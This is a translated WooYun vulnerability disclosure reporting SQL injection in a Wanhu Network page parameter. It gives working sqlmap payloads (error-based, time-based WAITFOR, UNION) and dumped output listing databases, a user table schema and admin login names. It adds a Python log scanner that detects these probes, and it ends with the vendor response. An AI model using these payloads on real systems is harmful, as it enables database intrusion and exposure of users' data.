Vulnerability summary

Defect ID: wooyun-2015-0131604

Title: SQL injection vulnerability on the 万户网络 (Wanhu Network) main site

Related vendor: CNCERT (cncert国家互联网应急中心, National Internet Emergency Response Center)

Author: jobf

Submitted: 2015-08-12 12:46

Fixed: 2015-09-26 14:38

Published: 2015-09-26 14:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-12: Details sent to the vendor; awaiting vendor handling
2015-08-12: CNCERT has not yet been able to contact the affected organization; details disclosed only to the notifying agency
2015-08-22: Details disclosed to core white hats and experts in the relevant field
2015-09-01: Details disclosed to regular white hats
2015-09-11: Details disclosed to intern white hats
2015-09-26: Details disclosed to the public

Brief description:

RT (as in the title)

Detailed description:

SQL injection on the 万户网络 site; the injection point is: http://**.**.**.**/zhidao/question.aspx?pid=18

[Screenshots: 2015-08-04_16h48_23.png, 2015-08-04_16h49_05.png, 2015-08-04_16h51_55.png, 2015-08-04_16h52_40.png, 2015-08-04_16h53_00.png]

Proof of vulnerability:

Parameter: pid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pid=18' AND 1227=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1227=1227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113))) AND 'rEWO'='rEWO
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: pid=18';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: pid=18' WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: pid=18' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(90)+CHAR(78)+CHAR(83)+CHAR(84)+CHAR(116)+CHAR(74)+CHAR(89)+CHAR(100)+CHAR(104)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: ReportServerTempDB
[9 tables]
+-----------------------------------------------------+
| ChunkData |
| ChunkSegmentMapping |
| ExecutionCache |
| PersistedStream |
| SegmentedChunk |
| SegmentedChunk |
| SessionData |
| SessionLock |
| SnapshotData |
+-----------------------------------------------------+
Database: msdb
[136 tables]
Database: Whir_ezEIP4_oagw20150212
[113 tables]
+-----------------------------------------------------+
| Whir_Cmn_Area |
| Whir_Cnt_Attached |
| Whir_Cnt_CreateLog |
| Whir_Cnt_Relation |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectColumn |
| Whir_Cnt_WorkFlowLogs |
| Whir_Dev_Column |
| Whir_Dev_ConfigStrategy |
| Whir_Dev_Field |
| Whir_Dev_FormArea |
| Whir_Dev_FormArea |
| Whir_Dev_FormDate |
| Whir_Dev_FormOption
Database: Whir_ezEIP4_oagw20150212
Table: Whir_Sec_Users
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CreateDate | datetime |
| CreateUser | nvarchar |
| Email | nvarchar |
| IsDel | bit |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LoginName | nvarchar |
| LoginType | nvarchar |
| Password | nvarchar |
| RealName | nvarchar |
| Remarks | nvarchar |
| RolesId | int |
| Sort | bigint |
| State | int |
| SystemLanguage | int |
| SystemSkin | nvarchar |
| UpdateDate | datetime |
| UpdateUser | nvarchar |
| UserId | int |
+----------------+----------+
Database: Whir_ezEIP4_oagw20150212
Table: Whir_Sec_Users
[5 entries]
+-----------+
| LoginName |
+-----------+
| admin |
| bjhr |
| gzwhir |
| jiangdx |
| root |
+-----------+
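The sqlmap output above shows four probe techniques against the pid parameter (error-based CONVERT, stacked/time-based WAITFOR DELAY, UNION, and CHAR()-built strings). As an added example, not part of the original report or the vendor's code, the following scans IIS W3C log lines for exactly those shapes; the sample log lines, IP addresses and regexes are constructed here.

```python
import re
from urllib.parse import parse_qs

# Probe shapes taken from the sqlmap techniques listed in the proof above;
# the regexes are ours and deliberately loose (case-insensitive, any spacing).
SIGNATURES = {
    "error-based (CONVERT)": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "stacked/time-based (WAITFOR DELAY)": re.compile(r"WAITFOR\s+DELAY", re.I),
    "UNION query": re.compile(r"UNION\s+(ALL\s+)?SELECT", re.I),
    "CHAR() string building": re.compile(r"(CHAR\(\d+\)\+){3,}", re.I),
}

# Constructed IIS W3C lines (date time s-ip method uri-stem uri-query port
# username c-ip user-agent status). IPs are placeholders; the query strings
# are URL-encoded the way IIS writes them.
SAMPLE_LOG = """\
2015-08-04 08:48:23 10.0.0.5 GET /zhidao/question.aspx pid=18 80 - 192.0.2.10 sqlmap/1.0 200
2015-08-04 08:48:24 10.0.0.5 GET /zhidao/question.aspx pid=18%27+AND+1227%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28112%29%29%29+AND+%27rEWO%27%3D%27rEWO 80 - 192.0.2.10 sqlmap/1.0 500
2015-08-04 08:48:25 10.0.0.5 GET /zhidao/question.aspx pid=18%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 192.0.2.10 sqlmap/1.0 200
2015-08-04 08:48:31 10.0.0.5 GET /zhidao/question.aspx pid=18%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL-- 80 - 192.0.2.10 sqlmap/1.0 200
2015-08-04 08:49:00 10.0.0.5 GET /zhidao/question.aspx pid=19 80 - 198.51.100.7 Mozilla/5.0 200
"""


def scan_line(line):
    """Return [(parameter, technique), ...] for one W3C log line."""
    fields = line.split()
    if len(fields) < 6 or fields[5] == "-":  # no query string logged
        return []
    hits = []
    # parse_qs undoes the percent-encoding and '+' for space, so the
    # signatures match the decoded SQL fragment rather than its encoded form.
    for name, values in parse_qs(fields[5], keep_blank_values=True).items():
        for value in values:
            for technique, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits.append((name, technique))
    return hits


def scan_log(text):
    """Return [(line_no, parameter, technique), ...] over a whole log."""
    return [(n, p, t)
            for n, line in enumerate(text.splitlines(), 1)
            for p, t in scan_line(line)]


if __name__ == "__main__":
    for n, p, t in scan_log(SAMPLE_LOG):
        print(f"line {n}: parameter {p!r} matches {t}")
```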

Fix recommendation:

Filter the input.

Copyright notice: when reposting, credit the source: jobf@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-08-12 14:37

Vendor reply:

CNVD confirms the vulnerability as described; a direct handling channel with the software vendor has not yet been established, and the case is pending claim.

Latest status:

None